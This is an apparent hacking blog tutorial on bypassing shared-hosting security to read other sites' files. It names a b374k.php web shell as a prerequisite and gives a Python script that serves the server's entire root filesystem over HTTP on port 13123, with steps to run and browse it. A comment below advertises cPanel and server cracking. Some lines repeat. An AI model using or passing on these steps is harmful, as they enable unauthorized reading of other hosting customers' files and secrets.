As we all know, symlinking it's on of greates methods for bypassing
server security, mean to read files of other site in same shared host.
For getting success with this tutorial are required the following things:
here we are in folder /var/www/dono and trying to go into /www/
For getting success with this tutorial are required the following things:
- Python Installed on Server
- b374k.php shell
- And some scripts u will see below.
here we are in folder /var/www/dono and trying to go into /www/
- no permissions to go into /www .
before we got tired by trying the commands u must check if if python it's installed with command :
python -h
Now take this python script and name it as webs.py , It's a little python script who will open a new port on server SimpleHTTPServer ( python ) module. Default port from script it's 13123 .
#!/usr/bin/env python # devilzc0de.org (c) 2012 import SimpleHTTPServer import SocketServer import os port = 13123 if __name__=='__main__': os.chdir('/') Handler = SimpleHTTPServer.SimpleHTTPRequestHandler httpd = SocketServer.TCPServer(("", port), Handler) print("Now open this server on webbrowser at port : " + str(port)) print("example: http://maho.com:" + str(port)) httpd.serve_forever()
Next u wil need to run the webs.py script by following commandpython webs.py
open the site with port 13123site.com:13123
1 মন্তব্য:
Click here for মন্তব্যhow to crack cpanel|how to crack server|how to crack symlink|how to crack shell cpanel
http://bicombusiness.blogspot.com/2016/01/cpanel-cracker.html
ConversionConversion EmoticonEmoticon